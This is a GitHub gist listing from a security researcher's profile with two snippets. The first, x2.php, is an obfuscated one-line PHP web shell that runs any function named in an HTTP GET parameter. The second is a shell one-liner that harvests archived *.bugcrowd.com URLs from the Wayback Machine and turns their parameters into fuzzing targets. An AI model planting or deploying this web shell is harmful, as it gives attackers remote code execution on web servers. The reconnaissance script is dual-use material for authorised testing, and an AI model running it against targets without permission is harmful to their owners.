Skip to content

Instantly share code, notes, and snippets.

View screetsec's full-sized avatar
:shipit:
We live by the code and was raised by ethics

Edo Maland screetsec

:shipit:
We live by the code and was raised by ethics
View GitHub Profile
@screetsec
screetsec / x2.php
Last active September 3, 2021 00:35
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
@screetsec
screetsec / gist:6ee948503960f1b9d4b7b8465aea2d73
Last active May 25, 2023 16:16
One Liner to get Hidden URL Parameter from Passive scan using Web Archive. Regex using DFA Engine, Support and Collecting URL with multi Parameter to Fuzzing & Removing Duplicate
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt